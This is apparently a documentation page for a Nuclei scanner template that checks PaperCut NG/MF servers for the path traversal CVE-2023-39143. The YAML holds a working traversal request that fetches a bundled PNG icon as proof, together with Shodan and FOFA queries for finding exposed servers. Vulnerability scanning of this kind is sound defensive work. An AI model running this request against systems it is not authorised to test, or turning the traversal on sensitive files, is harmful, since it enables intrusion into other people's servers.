Skip to content
Nuclei Templates

PaperCut < 22.1.3 - Path Traversal

ID: CVE-2023-39143

Severity: critical

Author: pdteam

Tags: cve2023,cve,lfi,papercut

Description

Section titled “Description”

PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.

YAML Source

Section titled “YAML Source”
id: CVE-2023-39143


info:
  name: PaperCut < 22.1.3 - Path Traversal
  author: pdteam
  severity: critical
  description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.
  impact: |
    An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of information or remote code execution.
  remediation: |
    Upgrade PaperCut to version 22.1.3 or later to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39143
    - https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/
    - https://www.papercut.com/kb/Main/securitybulletinjuly2023/
    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39143
    cwe-id: CWE-22
    epss-score: 0.95367
    epss-percentile: 0.9936
    cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_mf
    shodan-query:
      - html:"content=\"PaperCut\""
      - http.html:"papercut"
      - http.html:"content=\"papercut\""
      - cpe:"cpe:2.3:a:papercut:papercut_mf"
    fofa-query:
      - body="papercut"
      - body="content=\"papercut\""
  tags: cve2023,cve,lfi,papercut


http:
  - method: GET
    path:
      - "{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"


    matchers:
      - type: dsl
        dsl:
          - content_length == 1655
          - status_code == 200
          - contains(to_lower(content_type), "image/png")
          - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex
        condition: and
# digest: 4a0a0047304502205275a387abb0e9cc9c722dbd2aebed19cd2e74f91ca680c3ae8b7b0b7c3419a1022100b9a3ee3c7ece06374443a50a447be519e9abd912a9e92585287aa9202c692ac7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39143.yaml"

View on Github